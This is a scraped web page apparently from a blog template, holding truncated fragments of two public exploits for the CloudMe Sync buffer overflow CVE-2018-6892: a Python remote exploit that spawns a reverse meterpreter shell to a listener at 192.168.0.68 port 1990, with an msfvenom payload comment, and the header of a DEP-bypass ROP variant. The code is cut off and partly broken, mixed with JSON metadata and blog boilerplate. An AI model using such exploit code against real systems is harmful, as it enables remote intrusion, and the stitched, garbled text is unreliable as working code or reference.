![]() ![]() ![]() , "cvelist":, "modified": "T00:00:00", "id": "PACKETSTORM:146644", "href": "", "sourceData": "`#!/usr/bin/python \n# CloudMe Sync 1.9.2 Remote Exploit \n# Written by r00tpgp \n# Usage: python CloudMe-1.9.2-Exploit.py \n# Spawns reverse meterpreter LHOST=192.168.0.68 LPORT=1990 \n# CVE: CVE-2018-6892 \n# CloudMe Installer: \n# Tested on Windows 7 32b SP1 \n \nimport sys, socket, time \n \nhost = sys.argv # Recieve IP from user \nport = int(sys.argv) # Recieve Port from user \n \n# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0. Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow - WoW64 - (DEP Bypass) Date: Exploit Author: Matteo Malvica Vendor Homepage: Software: Category: Remote Contact: Version: CloudMe Sync 1.11.2 Tested on: Windows 7 SP1 圆4 CVE-2018-6892 Ported to WoW64 from import socket import struct def createropchain.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |